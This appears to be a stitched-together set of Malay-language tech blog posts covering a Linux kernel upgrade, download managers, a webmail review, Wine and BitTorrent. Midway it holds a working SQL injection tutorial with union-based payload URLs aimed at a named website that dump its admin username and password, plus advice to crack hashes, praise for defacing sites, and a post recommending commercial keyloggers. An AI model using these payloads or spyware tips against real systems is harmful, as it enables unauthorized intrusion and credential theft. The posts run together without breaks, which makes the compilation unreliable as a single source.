Asalnya tidak menjangka akan mendapat 12 Google Sitelinks untuk blog ini. Tetapi selepas membaca entri di blog Anarm.net dan juga di blog Amanz.my, Mr.Hac tergerak hati untuk memeriksa sendiri Google Sitelinks di blog ini sama ada sudah dikemaskini oleh Google atau tidak, dan hasilnya…
Mr.Hac tidak pasti apa kriteria blog ini sehingga memperoleh sebanyak itu. Nampaknya blog Mr.Hac sudah setanding dengan blog-blog ‘old-timer’ yang lain. Alhamdulillah..
Sila Google dengan kata kunci ‘my hackers are here’ untuk melihatnya sendiri.
Mr.Hac dapat tahu Kernel untuk Linux versi terbaru iaitu 3.0.2 (stable release) telah pun siap untuk dimuat turun. Apa itu Kernel? Nantilah dalam entri yang lain Mr.Hac akan cuba cerita sikit-sikit tentang Kernel dan Linux amnya.
Rujuk -> Softpedia untuk membaca apa penambahbaikan pada Kernel versi ini
Rujuk > Kernel Index untuk melihat kesemua senarai Kernel
Mr.Hac telah mencuba sendiri Kernel terbaru ini pada Ubuntu 11.04, dan apa yang boleh Mr.Hac katakan ialah ia lebih pantas, lebih smooth, dan menjimatkan penggunaan elektrik (bateri).
Sebelum memasang Kernel ini, sila pastikan ia berada di dalam direktori Home/Nama PC Anda
Sebagai contoh jika nama PC Mr.Hac ialah putra, maka fail-fail di atas
harus berada dalam direktori Home/putra <- Wajib ni. Mr.Hac dah cuba pasang secara bersepah-sepah, sekejap di desktop, sekejap dalam folder ‘Downloads’, memang tak berjaya. Tak perlu letak dalam folder, tapi biarkan ia ‘bersepah’ dalam direktori Home/Nama PC Anda itu.
Kemudian buka Terminal, taipkan baris perintah di bawah:
Pasang mengikut susunan yang telah Mr.Hac aturkan di atas. Setelah selesai, Restart PC anda dan anda akan dapat melihat Kernel baru tersebut siap untuk digunakan. Jika anda mahu membersihkan Kernel yang lama setelah berpuas hati dengan Kernel versi terbaru ini, anda boleh gunakan Ubuntu-Tweak.
Rujuk -> Deensokmo
Anda boleh menyemak kembali versi Kernel yang sedang anda gunakan dengan menaip baris perintah berikut dalam Terminal:
uname -r
P/S: Sebarang kekurangan dalam entri ini haraplah dimaafkan.
Tengok versi Kernel Mr.Hac yang telah dikemaskini. Jangan jaki ya.. hehe..
UPDATE: Kernel versi 3.0.3 stable release sudah keluar! yeah!
Seperkara lagi, JANGAN sesekali pasang KERNEL BARU jika anda telah pernah memasang pemacu tambahan (Proprietary Drivers). Jika pernah, sila nyahpasang terlebih dahulu (Uninstall), kemudian barulah anda pasang kernel baru tersebut.
Mr.Hac telah melakukan beberapa kajian terhadap ‘tingkah laku’ public/home keylogger dan industrial/commercial keylogger. Mr.Hac dapat merumuskan bahawa jika anda benar-benar mahu selamat dari sebarang jenis ‘trojan di dalam trojan’ yang gagal dikesan oleh antivirus anda, adalah lebih baik anda membeli keylogger (industrial) yang sah dari pembangunnya.
Kenapa? Ini adalah kerana pada kebanyakan public keylogger, ianya telah dibuat oleh Elite Hackers yang mahir atau pakar dalam bahasa pengaturcaraan. Mereka bukanlah bodoh, mahu memberi tanpa menerima apa-apa balasan. Jadi keylogger yang dihasilkan sememangnya bukan janji, tapi pasti mengandungi satu lagi ‘server’ keylogger yang telah ‘disuntik’ ke dalamnya. Tujuan? Mudah dan ringkas untuk difahami.. Hanya untuk mendapatkan maklumat sulit dan peribadi penggunanya. Bayangkan jika pengguna tersebut menaip maklumat log masuk dalam laman web bank, Paypal, Nuffnang… errr? Sudah tentu dengan mudah akaun mereka akan digodam. Ya.. Bukan janji lagi tapi pasti. (Hati-hati dengan fail yang bernama ‘stub.exe’ kerana selalunya ia adalah fail yang akan menjalankan keylogger secara senyap selepas perisian yang berhubung dengannya dijalankan)
Berbeza dengan industrial keylogger yang dijual secara umum di internet, ia jauh lebih selamat, dikemaskini secara konsisten oleh para pembangunnya (dengan tujuan untuk melepasi pengesanan antivirus), serta lebih canggih dengan pelbagai ciri yang sangat lengkap. Walaupun kadangkala harganya agak ‘tidak munasabah’, itu jauh lebih baik dari mendedahkan akaun anda kepada risiko penggodam. Mana mahu? Hilang RM100 kerana nak mencuba keylogger dari syarikat yang dipercayai intergritinya, atau hilang beribu-ribu wang di bank akibat menggunakan public keylogger?
Satu lagi pesanan Mr.Hac, seboleh-bolehnya kurangkan penggunaan perisian versi crack kerana dikhuatiri ia juga telah disuntik dengan keylogger, apatah lagi jika perisian itu adalah keylogger versi crack!
Sebelum kita teruskan kepada ‘isi’ entri, Mr.Hac nak bagitau yang ini adalah hasil penelitian Mr.Hac sendiri, pendapat Mr.Hac sendiri.. Jadi kalau ia bertentangan dengan pendapat anda, anggap ia perkara biasa. Terima kasih.
Mr.Hac dah pun Google berjam-jam lamanya, dan pelbagai pendapat telah Mr.Hac baca dan kaji sendiri. Namun setelah mencuba, ternyata pendapat-pendapat yang diberikan adalah pendirian peribadi dan bukan hasil ‘kajian’.. Oleh itu Mr.Hac dapat merumuskan terdapat 3 download manager yang bagus untuk dicuba oleh para pengguna Ubuntu dan ada antaranya kita sudah sedia maklum. Anda perlu tahu Mr.Hac melakukan ujian ini pada kelajuan internet 1mbps (Streamix) dan 1gbps (Office). Oleh itu Mr.Hac melihat download manager mana yang terbaik dalam mengendalikan fail yang sedang dimuat turun serta kelajuan sambungan internet yang digunakan.
Memang terdapat beberapa lagi senarai download manager yang terbaik tetapi Mr.Hac cuma senaraikan 3 sahaja (banyak sangat nanti pening). Secara peribadi Mr.Hac lebih sukakan UGet kerana paparan GUI yang lebih kemas, kelajuan muat turun stabil, dan mudah untuk difahami. Walaupun tidak sehebat IDM, tetapi boleh dikatakan ia mampu menggantikan IDM sekiranya ia diperkemaskan lagi dan ditambah beberapa ciri yang ada pada IDM seperti force downloading (dengan keystroke) serta tetapan sambungan. Apa yang menarik, FatRat serta UGet menyokong protokol BitTorrent dan ini memudahkan kepada peminat Torrent tanpa perlu membuka dua download manager pada waktu yang sama. Rujuk -> Deensokmo
Bagaimanapun dari segi kelajuan, Mr.Hac akui DownThemAll (DTA) adalah pemenangnya!
(Dengan syarat ia digabungkan bersama FireDownload 2.0)
Ciri yang lain sama sahaja pada setiap download manager, iaitu ia melakukan ‘acceleration’ untuk setiap muat turun. Download Manager ibarat kaunter di kompleks membeli-belah. Jika terdapat 100 orang pembeli yang mahu membayar sedangkan hanya ada satu sahaja kaunter, ia akan melambatkan proses pembayaran sedangkan kesemua pembeli akan keluar melalui satu pintu yang sama. Akan tetapi jika terdapat 100 pembeli dengan 10 kaunter, maka proses pembayaran akan menjadi lebih lancar dan cepat. Inilah perumpamaan ‘acceleration’ pada download manager.
Mempercepatkan proses muat turun dengan membahagikan fail kepada beberapa bahagian (partition/segmentation) dan memuat turunnya dengan efisien sambil menggunakan mana-mana sumber sambungan yang ada dengan baik. Rujuk -> IDM
Bagaimana dengan anda? Apakah download manager kegemaran anda? Kongsikan bersama para pembaca di sini..
Pertama kali terbaca tentang myemail.my di eins.my, Mr.Hac terus mencuba sendiri e-mel yang telah dibina oleh syarikat Tricubes itu. E-mel yang digelar sebagai e-mel 1Malaysia itu bagaimanapun masih dalam peringkat beta.
Rekabentuk paparan muka hadapan. Penuh dengan warna merah. Menunya tampak ringkas, bersahaja, biasa, tetapi boleh dikatakan kemas dan cantik.
Perlu lebih penambahbaikan supaya paparannya warnanya tidak menjengkelkan mata yang melihat.
TamTam? hah??
Paparan sebelum masuk ke inbox. No Komen..
Paparan dari bahagian inbox.
Ah.. Malasnya nak tulis review pasal myemail.my ni.. Laman e-mel ini perlu banyak penambahbaikan dari segi paparan antaramuka, dari segi pembaikan bugs, kerana ada beberapa kali Mr.Hac masuk ke bahagian inbox, ia mengalami ‘technical error’ dan tiada sebarang paparan yang keluar. Mr.Hac faham ia masih di peringkat beta, oleh itu Mr.Hac berharap pada peringkat stable akan datang, bugs ‘kecil-kecilan’ seperti ini sudah diperbaiki. Mr.Hac juga kurang berkenan dengan warna merah yang memenuhi ruang paparan e-mel myemail.my.. Tidak pasti mengapa ia direka sebegitu.
Sedangkan jika kita melihat kepada Gmail, warnanya sangat ringkas tetapi laju, begitu juga dengan Yahoomail rilis terbaru, gabungan warna biru muda yang begitu menenangkan, dan ciri kelajuan pembukaan e-mel juga amat memuaskan hati. Sememangnya anda boleh menukar tema (theme) pada myemail.my, dan ciri inilah yang ‘menyelamatkannya’.
Anda akan mendapat ruang penyimpanan sebanyak 25GB selepas siap mendaftar dan mengesahkan pendaftaran melalui e-mel alternatif yang dipilih oleh anda. 25GB, cukup lah? kan? errr.. (cukup ke?)
Pendaftaran akan menggunakan nama yang tertera pada MyKad anda. Ciri ini mungkin kurang disenangi oleh mereka yang inginkan ‘kebebasan’ dalam komunikasi di internet. So you’re no longer anonymous huh? hahah.. Cukuplah kot setakat ni. Hmm..
Setakat ini belum ada lagi komunikasi e-mel yang Mr.Hac lakukan melalui myemail.my. Review ini hanya menyentuh mengenai isu paparannya dan juga bugs yang bakal anda hadapi. Mahu mencubanya sendiri? Sila ke -> myemail.my
Sebelum Mr.Hac memulakan entri ini, Mr.Hac ingin memohon ampun dan maaf dari para pembaca yang menghantar e-mel kepada Mr.Hac melalui ruangan ‘Hubungi Admin’ kerana bertanyakan masalah tentang perisian, komputer, tips, dan sebagainya. Buat masa ini Mr.Hac tidak dapat menjawab semua pertanyaan anda akibat kesibukan di pejabat, tambahan pula bulan Ramadhan ini agak sukar untuk meluangkan masa di depan netbook pada malam hari. Mr.Hac telah menerima lebih dari 100 e-mel terbaru (belum campur yang lama la maknanya) dan kebanyakannya masih belum berjawab lagi. Maaf semua.
Entri ini Mr.Hac tujukan kepada semua pembaca yang selalu bertanyakan kepada Mr.Hac,
“Mr.Hac, susah ke nak pakai Linux ni?”
atau
“Mr.Hac, betul ke semua benda yang kita nak buat dalam Linux perlu guna command?”
atau
“Mr.Hac, Linux ni support ke software Windows?”
OK.ok.. Biarlah Mr.Hac buat kesimpulan untuk semua soalan di atas. Untuk pengetahuan anda, itulah soalan yang sama, yang mula-mula Mr.Hac fikirkan ketika hendak mencuba distro Linux (Ubuntu) dahulu. Namun, atas dasar prinsip yang selalu Mr.Hac pegang, iaitu ‘Jangan dengar sangat cakap orang, cuba sendiri dulu’, Mr.Hac pun terus memasang sistem operasi Ubuntu, dan sejak dari hari itu terus menjadi pengguna yang setia sehingga sekarang (Ubuntu 11.04).
Jika anda mahu tahu, baris perintah di bawah ialah baris perintah yang pertama Mr.Hac fahamkan
dan hafal!
sudo add-apt-repository ppa:ubuntu-wine/ppa
sudo apt-get update
sudo apt-get install wine
Nota: perintah ‘apt-get’ sudah boleh digantikan dengan ‘apt-fast’ yang lebih cepat dan efisien.
Rujuk Menggantikan apt-get dengan apt-fast untuk kepantasan
Wine pula sudah boleh dipasang dengan versi 1.3 (beta, pada masa entri ini ditulis)
Baris perintah di atas digunakan untuk memasang Wine (Windows Emulator), yang secara amnya digunakan untuk memasang perisian Windows pada sistem operasi Linux dan membantu ia untuk berfungsi (not just imitate, but provide compatibility).
Rujuk Wikipedia
Juga anda boleh rujuk di sini untuk mengetahui dua lagi alternatif kepada Wine.
Oleh itu soalan adakah sistem operasi Linux menyokong perisian Windows, jawapannya adalah ya dan tidak. Kerana sememangnya boleh untuk memasang perisian Windows pada Linux, sememangnya ada yang dapat digunakan dengan cemerlang sekali, namun tidak semuanya berjaya digunakan. Ok?
Persoalan susah atau tidak, itu sebenarnya bergantung kepada individu untuk menyesuaikan diri dengan persekitaran ruang kerja atau desktop Linux. Jika anda adalah ‘fast learner’ tidak wujud soal susah sebab Mr.Hac sendiri bukan dari golongan yang sangat cekap dengan kaedah pembelajaran, tetapi Mr.Hac sudah mampu faham sedikit demi sedikit mengenai Linux.
Jika ada yang meragui kenyataan ini kerana selalu dimomokkan dengan Linux = Command Line, ini adalah sangat tidak benar. Ya, memang sistem operasi Linux banyak bermain dengan baris perintah yang ditaip pada TERMINAL (jika anda pengguna Windows, Terminal ibarat Command). Namun tidak semua perkara dilakukan melaluinya. Sebagai contoh Ubuntu mempunyai ‘Ubuntu Software Center’, yang membantu para pengguna mencari beribu-ribu jenis perisian percuma serta memasangnya dengan mudah dari situ. Akan tetapi, dalam banyak-banyak perkara yang menarik hari Mr.Hac, ialah penggunaan Terminal! Sebabnya Terminal adalah jauh lebih maju dan berkuasa berbanding dengan Command pada Windows. Pelbagai perkara dapat dilakukan dengan mudah dan cepat seperti memasang perisian, mengemaskini status Twitter, dan sebagainya!
Kerana itu jugalah Mr.Hac begitu menyukai Terminal, sehingga sukar untuk meninggalkan Ubuntu dan beralih ke WIndows 7 kecuali atas sebab-sebab tertentu seperti IDM!
(sesiapa yang dah lama follow blog ni pasti tahu Mr.Hac ‘addict’ dengan IDM)
Jika anda terasa kurang yakin, kurang keberanian, atau kurang apa sahaja yang menyebabkan anda takut untuk mencuba Linux, Mr.Hac sarankan anda buang perasaan tersebut jauh-jauh, dan buat mereka yang mahu beralih kepada Linux (pengguna baru), disarankan untuk anda mencuba Ubuntu, disebabkan Ubuntu mudah untuk difahami, tidak rumit, dan amat user-friendly. Tidak perlu untuk menyahpasang (uninstall) sistem operasi Windows yang dah sedia ada, anda hanya perlu terus memasang Ubuntu dari dalam Windows lagi, dengan menggunakan Wubi (Ubuntu Windows Installer), dan ini bermakna anda boleh menyahpasang Ubuntu juga dari dalam Windows seperti perisian yang biasa lainnya!
Bagaimana? Teruja dengan saranan Mr.Hac?]
Cubalah sekarang dan berikan pendapat anda!
Bulan puasa ni memang terasa sangat ‘lemaunya’.. So.. Mr.Hac harap anda yang menjadi pengunjung setia blog ini boleh memaafkan kami para ‘pengepos’, atas kelewatan menerbitkan bahan bacaan bermutu untuk anda (kalau kurang mutunya maaf!)
Ini mungkin adalah entri terakhir Mr.Hac……………………………. tentang Torrent..
Sila baca entri Mr.Hac tentang Torrent sebelum ini:
P/S: Penting untuk anda faham teori Torrent dari awal.
Mr.Hac ingin memendekkan entri ini kerana sedang terfikirkan idea untuk menulis entri yang lain. Jadi, berdasarkan tajuk, panduan untuk memilih fail Torrent yang paling laju untuk dimuat turun adalah dengan melihat kepada ratio Seeders dan Peers (Swarm). Jika jumlah ratio Seeders melebihi Peers, maka ia adalah fail Torrent yang patut dipilih, kerana secara teorinya Seeders tidak ‘mengambil’ bandwidth dengan memuat turun fail, tetapi Seeders ‘memberikan’ bandwidth atas dasar perkongsian dengan memuat naik kembali fail yang telah dimuat turun.
Kemudian, jika anda menggunakan BitComet, atau uTorrent, apa yang terbaik untuk anda lakukan ialah dengan menjadi Seeders yang berkaliber, iaitu dengan sentiasa memuat naik kembali kesemua fail yang telah anda muat turun dengan cara membiarkan klien anda terbuka lebih lama selepas siap memuat turun. Lebih banyak, lebih lama, lebih baik. Dengan cara ini, uTorrent akan melihat anda memberikan komitmen yang baik lalu menghantar kepada anda bandwidth yang ‘sepatutnya’. Tambahan pula klien BitComet menggunakan sistem ‘Ranking’ untuk menentukan ‘siapa anda’. Oleh itu, cuba dapatkan point dan ranking yang terbaik untuk melihat dan mendapatkan kesannya.
Anda perlu fahamkan konsep BitTorrent, kerana ia adalah komuniti ‘memberi dan menerima’. Jangan hanya tahu menerima tanpa memberi, kerana ini adalah cara BitTorrent kekal ‘hidup’. Apabila anda menjadi Seeders yang berwibawa, komputer dari Trackers tidak akan teragak-agak untuk membantu anda memuat turun apapun fail yang anda inginkan dengan pantas. Walaupun ini cuma satu teori, tetapi kenapa tidak anda buktikan teori ini sendiri? Ada juga yang mengatakan untuk mendapatkan bandwidth yang lebih, dan laju, anda perlu melakukan proses portforwarding. Caranya tidak sama untuk setiap router. Oleh itu anda perlu Google sendiri bagi mendapatkan tutorial yang tepat. Biarpun portforwarding dikatakan tidak banyak membantu (kerana tindakan ISP menyekat port yang selalu digunakan oleh perisian P2P), tetapi sekurang-kurangnya jika ada penambahan kelajuan walaupun sedikit itu sudah lebih dari cukup.
Selain itu, penggunaan VPN dikatakan dapat membantu ‘network environment’ yang disekat oleh Corporate Firewall seperti Websense, Sonic Wall, dan Barracuda. Bagi kebanyakan penyedia servis rangkaian internet (Internet Service Provider @ ISP) di Malaysia ini, mungkin mereka tidak menyekat dengan agresif, namun tindakan menyekat laman-laman Torrent serta port-port yang selalu digunakan adalah satu tindakan yang menyusahkan. Namun, ia menjadi pemangkin untuk rakyat Malaysia menjadi lebih kreatif dalam mengatasi masalah ini, dan kerana itulah wujudnya entri-entri blog seperti yang sedang anda baca sekarang…
Untuk mendapatkan lebih banyak tips seperti ini (tentang Torrent), rajin-rajinlah Google, dan menyertai mana-mana forum yang berkaitan. Sekian, dan salam hormat.
– Jadi sekarang anda sudah dapat lihat table yang ada dalam laman tersebut , langkah terakhir ini ialah untuk mengumpul Data daripada table.
– Jadi , perkara asas yang biasanya penggodam lakukan ialah mencari table yang mengandungi maklumat Admin / users bagi membolehkannya mendapatkan maklumat login ( email, username, password dll)
– Gunakan arahan group_concat(table_name) pada no ajaib bagi mengeluarkan maklumat dalam table tersebut.
– Kali ini anda akan perhatikan folder table yang mengandungi data didalamnya. Contohnya anda lihat table yang bernama ” Admin ” , sila convert table name ” Admin ” tersebut kepada HEXADECIMEL
– Setelah anda convert , sila masukkan arahan group_concat(column_name) kat no ajaib tadi ( 2 ).
– Dan kemudian tambahkan arahan +from+information_schema.columns+where+table_name=0xHEXADECIMEL– . Contohnya table name tadi ” Admin ” , setelah di convert menjadi 41444D494E . Maka arahan akan jadi seperti berikut :
– Sekarang kita berada dalam folder ADMIN , jadi kita akan keluarkan data melalui arahan concat_ws(0x3a,”nama column yang terkandung dlm table ADMIN”) . Contohnya table yang ada ialah “username” dan “password” , maka arahan akan jadi seperti berikut :
– Kemudian gantikan arahan belakang kepada +from+Admin– bagi menjayakan arahan untuk mendapatkan maklumat daripada table ADMIN. Maka arahan akan seperti berikut :
– Dan sekarang anda akan lihat data “username” dan “password” seperti arahan yang kita jalankan.
– Password berkemungkinan besar dalam bentuk hash , jadi anda perlu decrypt untuk mendapatkan plain text nya seterusnya mendapatkan login page admin tersebut.
——————————————————————
Biaklah, berbalik pada tutor pada siri yang lepas, setelah diteliti kita dapati table yang kita perlukan bernama tbladmin. Apa yang perlu kita buat lepas ni ialah kita perlu tukarkan perkataan atau nama table tadi kepada nilai HEX (hexadecimal) ataupon nilai ASCII (sebutannya ‘ass-key’… ops…).
Masukkan kotak pertama dengan nama table, dalam tutor ini kita ambil tbladmin untuk tukar ke ASCII atau ke HEX. Masukkan perkataan seperti dibawah untuk tukar.
tbladmin
setelah dapat ASCII bagi nama table, apa yang kita perlu buat selepas itu ialah buangkan karakter ” & # “sekiranaya ada dan tambah tanda koma “,” diantara setiap nombor sekiranya tiada .
Ia akan kelihatan seperti ini bagi ASCII:
116,98,108,97,100,109,105,110
dan begini kalau HEX:
74626C61646D696E
Seterusnya tukarkan beberapa perkataan yang terdapat di URL, tukar “table_name” kepada “column_name” dan tukar “information_schema.tables” kepada “information_schema.columns” dan tambahkan diakhir dengan “where table_name=char(nilai ASCII)–” ataupon “where table_name=0x(nilai HEX)–”
dimana dalam kes ini kita masukkan (nilai ASCII) itu dengan (116,98,108,97,100,109,105,110)– atau nilai HEX dengan 74626C61646D696E–
URL kita akan kelihatan seperti ini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)–
atau,
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=0x74626C61646D696–
Laman kita akan kelihatan seperti ini:
Yay, sekarang kita dah nampak nama-nama column yang menyimpan data. Langkah seterusnya kita cari column mana yang mungkin menyimpan data yang kita perlukan. Dalam kes ini kita cari column yang bernama “username” dan “password” atau sesuatu yang seakannya. Nama column mungkin berbeza mengikut cita rasa admin laman tersebut, jadi kena bijak buat pilihan. Bagi kes dalam tutor ini kita dapat senang jer iaitu “username” dan “password”.
Lepas dah dapat tengok nama-nama column ni, kita perlu ubah URL kita lagi sekali. Kali ini, kita buang semua selepas nombor column terakhir – dalam kes ini ia nombor 11 (rujuk tutor sebelum ini macam mana kita dapat) dan tambahkan “from tbladmin” diakhir URL dan gantikan “column_name” dengan “concat(username,0x3a,password)”. 0x3a ialah nilai ASCII bagi tanda “ : ” . ia digunakan untuk memisahkan username dan password .
URL kita kelihatan begini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin
Maka, akan terpaparlah data seperti di bawah:
Kita Berjaya ! Kita dah dapat username ishir dan password ishir123
kadang-kadang password di enkrip dengan Hashes. Gunakan HASH Detector dibawah untuk dekrip password. Boleh jugak guna HASH decryptor yang online jika anda mahu.
Alhamdulillah selesai jugak tutorial Asas SQLi ni. kepada korang semua, Selamat mencuba semua yer. Lagi sekali Kredit kepada KenaHack [KH] dan Komuniti Hack diatas tutorial ini. Janjang mohon maaf kalau ade yang tak jelas dalam siri Asas SQLi ni ataupon Janjang tak dapat nak jawap soalan2 korang dalam siri2 lepas. Nak buat camne, penulis ni p on noob jer. Lain la Mr.Hac dengan Analyzer, siap dah deface website orang lagi.. power tol diorangkan. Kalau tanyer diorang berdua tu mesti dapat jawab punyer la.
Harap-harap ni bukan entri terakhir Janjang, insyaAllah kita jumpe lagi dalam entri akan datang..
Bagi sesiapa yang belum membaca lagi entri Mr.Hac tentang Torrent sebelum ini boleh lah membacanya di sini -> Pengenalan Kepada BitTorrent/Torrent
Untuk pengetahuan anda, Mr.Hac telah mencuba pelbagai klien Torrent/Torrent Downloader tetapi akhirnya Mr.Hac sampai kepada 3 klien yang terbaik iaitu:
Tiada nombor 1, 2 atau 3 kerana ketiga-tiganya adalah terbaik. Tetapi, favourite by Mr.Hac ialah BitComet (walaupun BitComet pernah ada isu mengenai eksploitasi seeds untuk mendapatkan kelajuan maksima) kerana BitComet setanding dengan IDM apabila ia menyokong kesemua protokol muat turun (BitTorrent, HTTP, FTP).
Laju? Hmm.. Boleh la.. BitComet vs IDM? Hmm.. Susah nak cakap tu. Sebab masing-masing ada kelebihan. Kalau tengok balik, kelajuan muat turun masing-masing sama je.
Ok. Cukuplah setakat ni. Kita jumpa lagi dalam entri seterusnya. Assalamualaikum..
Adakah anda ‘kaki Torrent’? Terlebih dahulu biarlah Mr.Hac kenalkan dengan beberapa istilah yang ada dalam ‘arena’ Torrent. Mr.Hac akan terangkan secara ringkas mengikut pemahaman Mr.Hac sendiri, so.. keep on reading guys..
Apa Itu BitTorrent?
Kerap dikenali sebagai ‘BT’, ialah satu protokol sambungan internet yang membolehkan pengguna memuat turun fail dengan lebih pantas dan efisien.
Torrent: Sejenis fail metadata, iaitu fail yang mengandungi kesemua maklumat tentang data yang akan dimuat turun.
Seed/Seeder: Mesin (komputer) yang mempunyai fail yang lengkap. Contohnya jika anda sudah selesai memuat turun satu fail, anda biarkan klien Torrent anda kekal terbuka. Selepas itu ia akan mula memuat naik kembali data fail tadi, oleh itu anda adalah Seeder. Ini adalah perkongsian yang baik kerana anda membantu orang lain untuk memperolehi fail yang sama. Anda ibarat satu sumber kepada para pengguna yang lain untuk memperolehi fail yang telah lengkap.
Tracker: Mesin (komputer) yang digunakan oleh BitTorrent untuk mengenalpasti dan menjejak Peers.
Peer: Peers ialah mesin (komputer) yang masing-masing mempunyai fail tetapi dalam keadaan tidak lengkap. Fail tersebut ibarat dalam bentuk pecahan ‘puzzle’, setiap peer akan berkongsi/bertukar fail yang dimiliki dengan Peers yang lain untuk ‘melengkapkan pecahan puzzle’ tersebut dengan menggunakan klien Torrent masing-masing.
BitTorrent menyelesaikan masalah muat turun yang lambat, dan kadangkala tersekat di pertengahan jalan. Ini kerana setiap orang yang memuat turun fail telah memuat turun dari SATU SUMBER yang sama. Apabila terdapat terlalu ramai yang ingin memuat turun, pelayan akan melakukan kerja yang lebih dan ini boleh membawa kepada ‘crash’.
BitTorrent menyelesaikan masalah ini dengan menukarkan setiap pemuat turun kepada SUMBER (Seeds). Dengan cara ini, perkongsian fail menjadi lebih pintar dan pantas kerana apabila terdapat ramai pemuat turun (Peers) yang terlibat, maka kelajuan muat turun juga akan bertambah (secara teorinya, walaupun belum begitu tepat).
Ianya ibarat Seeds memberikan kepada setiap seorang pemuat turun satu pecahan ‘puzzle’. Setiap pemuat turun yang telah mendapat satu pecahan ini akan menjadi Peer. Setiap Peer adalah SUMBER dan memberikan/berkongsi pecahan fail yang diperolehi dengan para pemuat turun yang lain, sehinggalah pecahan tersebut menjadi satu fail yang lengkap, lalu Peers bertukar menjadi Seeds.
Download Torrent File -> Seeds -> Downloaders -> Peers -> Tracker -> Provide ‘puzzle’ file to other Peers when introduced by Tracker -> Complete File -> Become Seed
(Carta alir ni Mr.Hac tulis sendiri.. so buat-buat paham la kalau tak paham.. hehe..)
Jika anda perhatikan kepada carta alir di atas, tidak hairanlah protokol BitTorrent dipanggil sebagai ‘Peer-to-Peer’ atau ‘P2P’ File Sharing.
Untuk entri akan datang, InsyaAllah Mr.Hac akan berkongsi tips memilih fail Torrent yang pantas, dan klien Torrent kegemaran Mr.Hac.
